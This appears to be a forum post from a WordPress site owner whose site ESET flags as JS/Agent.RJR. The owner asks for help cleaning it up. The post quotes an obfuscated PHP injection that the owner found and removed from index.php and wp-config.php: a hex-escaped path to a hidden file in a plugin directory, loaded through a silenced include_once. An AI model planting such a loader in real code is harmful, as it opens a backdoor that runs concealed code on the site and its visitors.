HI.
On my website https://pgmprzemysl.pl ESET detects JS/Agent.RJR.
I scanned website on VirtusTotal (https://www.virustotal.com/gui/url/a62fdc26b3fcd54a45a5d1a3e431f154fade046c29fdc57a70438839ec9f92d4) but scanner shows that everything is clean.
I found something like
$r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss"; strpos($r9, 't5y'); @include_once /* p2bc */ ($r9);
in index.php and wp-config.php files and I removed this, but still JS/Agent.RJR is somewhere detected.
What else should I check?